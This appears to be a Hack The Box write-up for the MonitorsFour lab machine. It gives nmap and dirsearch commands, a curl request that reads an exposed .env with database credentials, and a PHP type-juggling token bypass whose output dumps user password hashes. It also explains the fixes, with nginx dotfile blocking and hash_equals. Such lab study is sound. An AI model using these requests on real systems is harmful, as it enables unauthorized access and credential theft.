Difficulty: easy | OS: Windows

#2025-12-09

Nmap Scan enumeration

htb/machine/MonitorsFour
$ nmap -Pn -sV -sC -T4 -A 10.10.11.98
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-09 20:05 +0800
Nmap scan report for 10.10.11.98
Host is up (0.34s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx
|_http-title: Did not follow redirect to http://monitorsfour.htb/
5985/tcp open  http    Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.27 seconds

htb/machine/MonitorsFour took 1m8s
$ curl -I http://10.10.11.98:80
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Tue, 09 Dec 2025 12:07:16 GMT
Content-Type: text/html
Content-Length: 138
Connection: keep-alive
Location: http://monitorsfour.htb/

htb/machine/MonitorsFour
$ sudo nano /etc/hosts

htb/machine/MonitorsFour took 7s
$

Directory Enumeration

htb/machine/MonitorsFour took 27s
$ dirsearch -u http://monitorsfour.htb -x 404
/usr/share/dirsearch/lib/core/installation.py:24: UserWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12293

Target: <http://monitorsfour.htb/>

[20:32:06] Scanning:
[20:32:26] 200 -    97B - /.env
[20:33:14] 403 -   548B - /admin/.htaccess
[20:33:46] 403 -   548B - /administrator/.htaccess
[20:34:03] 403 -   548B - /app/.htaccess
[20:34:38] 200 -   367B - /contact
[20:34:40] 403 -   548B - /controllers/
[20:35:33] 200 -    4KB - /login
[###############     ] 79%   9733/12293        27/s       job:1/1  errors:0

Exposed .env

htb/machine/MonitorsFour
$ curl -v "http://monitorsfour.htb/.env"
* Host monitorsfour.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.98
*   Trying 10.10.11.98:80...
* Established connection to monitorsfour.htb (10.10.11.98 port 80) from 10.10.14.218 port 44758
* using HTTP/1.x
> GET /.env HTTP/1.1
> Host: monitorsfour.htb
> User-Agent: curl/8.17.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx
< Date: Tue, 09 Dec 2025 12:36:54 GMT
< Content-Type: application/octet-stream
< Content-Length: 97
< Last-Modified: Sat, 13 Sep 2025 05:37:28 GMT
< Connection: keep-alive
< ETag: "68c50318-61"
< Accept-Ranges: bytes
<
DB_HOST=mariadb
DB_PORT=3306
DB_NAME=monitorsfour_db
DB_USER=monitorsdbuser
DB_PASS=f37p2j8f4t0r
* Connection #0 to host monitorsfour.htb:80 left intact

htb/machine/MonitorsFour
$

We now have the database credentials. There is also more to test on this web application.
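The .env was served because it sits under the nginx document root and nothing stops the static-file handler from returning dotfiles. As an added illustration (not the MonitorsFour box's actual configuration; the paths and vhost layout are assumptions), here is the weak pattern next to the corrected one:

```nginx
# Weak: the app directory itself is the web root, so .env, .git and friends
# are plain static files as far as nginx is concerned.
server {
    listen 80;
    server_name monitorsfour.htb;
    root /var/www/app;              # assumed path: .env lives right here

    location / {
        try_files $uri $uri/ /index.php?$query_string;
    }
}

# Corrected: serve only the public/ subdirectory, and refuse any path
# component that starts with a dot (except ACME's .well-known).
server {
    listen 80;
    server_name monitorsfour.htb;
    root /var/www/app/public;       # assumed path: .env is one level above

    # Regex locations are checked before the prefix "/" location, so this
    # wins for /.env, /admin/.htaccess, /.git/config, etc.
    location ~ /\.(?!well-known/) {
        return 404;                 # 404 rather than 403: don't confirm the file exists
    }

    location / {
        try_files $uri $uri/ /index.php?$query_string;
    }
}
```

After a reload, `curl -I http://monitorsfour.htb/.env` should come back 404 rather than 200 with `Content-Type: application/octet-stream`; the same dirsearch run above would then show nothing for the `.htaccess` probes either.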

Type juggling attack

htb/machine/MonitorsFour
$ curl -v "http://monitorsfour.htb/user?token=0e1234"
* Host monitorsfour.htb:80 was resolved.
* IPv6: (none)
* IPv4: 10.10.11.98
*   Trying 10.10.11.98:80...
* Established connection to monitorsfour.htb (10.10.11.98 port 80) from 10.10.14.218 port 58968
* using HTTP/1.x
> GET /user?token=0e1234 HTTP/1.1
> Host: monitorsfour.htb
> User-Agent: curl/8.17.0
> Accept: */*
>
* Request completely sent off
< HTTP/1.1 200 OK
< Server: nginx
< Date: Tue, 09 Dec 2025 12:21:29 GMT
< Content-Type: text/html; charset=UTF-8
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/8.3.27
< Set-Cookie: PHPSESSID=ea18eb1cc6039305572e0bda0950d7c7; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
<
[
  {"id":2,"username":"admin","email":"admin@monitorsfour.htb","password":"56b32eb43e6f15395f6c46c1c9e1cd36","role":"super user","token":"8024b78f83f102da4f","name":"Marcus Higgins","position":"System Administrator","dob":"1978-04-26","start_date":"2021-01-12","salary":"320800.00"},
  {"id":5,"username":"mwatson","email":"mwatson@monitorsfour.htb","password":"69196959c16b26ef00b77d82cf6eb169","role":"user","token":"0e543210987654321","name":"Michael Watson","position":"Website Administrator","dob":"1985-02-15","start_date":"2021-05-11","salary":"75000.01"},
  {"id":6,"username":"janderson","email":"janderson@monitorsfour.htb","password":"2a22dcf99190c322d974c8df5ba3256b","role":"user","token":"0e999999999999999","name":"Jennifer Anderson","position":"Network Engineer","dob":"1990-07-16","start_date":"2021-06-20","salary":"68000.00"},
  {"id":7,"username":"dthompson","email":"dthompson@monitorsfour.htb","password":"8d4a7e7fd08555133e056d9aacb1e519","role":"user","token":"0e111111111111111","name":"David Thompson","position":"Database Manager","dob":"1982-11-23","start_date":"2022-09-15","salary":"83000.00"}
]
* Connection #0 to host monitorsfour.htb:80 left intact
htb/machine/MonitorsFour
$

On the first try we got even more information: every user record, password hashes included.
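Why `0e1234` matched at all: PHP's `==` compares two numeric strings as numbers, and `"0e<digits>"` is scientific notation for zero, so `"0e1234"` is loosely equal to every stored token that starts with `0e` and continues with digits (mwatson, janderson, dthompson above). This still holds on PHP 8.3. The following is an added example, not the target's code, using token values from the response above as constructed sample data; it shows the loose lookup beside a lookup that cannot be juggled:

```php
<?php
// Added example (not from the MonitorsFour writeup or the target's source).
// Sample tokens shaped like the ones returned by /user above.
const SAMPLE_TOKENS = [
    'admin'     => '8024b78f83f102da4f',
    'mwatson'   => '0e543210987654321',
    'janderson' => '0e999999999999999',
];

// Vulnerable: loose comparison. Two numeric strings are compared as floats,
// and "0e..." parses to 0.0, so any "0e<digits>" input matches every
// "0e<digits>" token.
function findUserLoose(string $supplied, array $tokens): array
{
    $matches = [];
    foreach ($tokens as $user => $token) {
        if ($supplied == $token) {          // the bug: numeric coercion
            $matches[] = $user;
        }
    }
    return $matches;
}

// Hardened: hash_equals() compares the raw bytes in constant time and never
// converts either operand to a number. A strict === would also stop the
// juggling, but would leak timing on a secret comparison.
function findUserStrict(string $supplied, array $tokens): array
{
    $matches = [];
    foreach ($tokens as $user => $token) {
        if (hash_equals($token, $supplied)) {
            $matches[] = $user;
        }
    }
    return $matches;
}

var_dump("0e1234" == "0e543210987654321");
print_r(findUserLoose('0e1234', SAMPLE_TOKENS));
print_r(findUserStrict('0e1234', SAMPLE_TOKENS));
print_r(findUserStrict('0e543210987654321', SAMPLE_TOKENS));
```

Run with `php example.php`: the loose lookup returns both `0e` users for the bogus token, the strict lookup returns nobody for it and only `mwatson` for the real value. Two further points a review of this endpoint would raise: tokens should be generated from a CSPRNG (`random_bytes()`) with enough length that a `0e` prefix is not a practical concern, and a token lookup has no business returning every user's password hash regardless of how the comparison is done.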

Save the user and admin hashes into hashes.txt to crack them.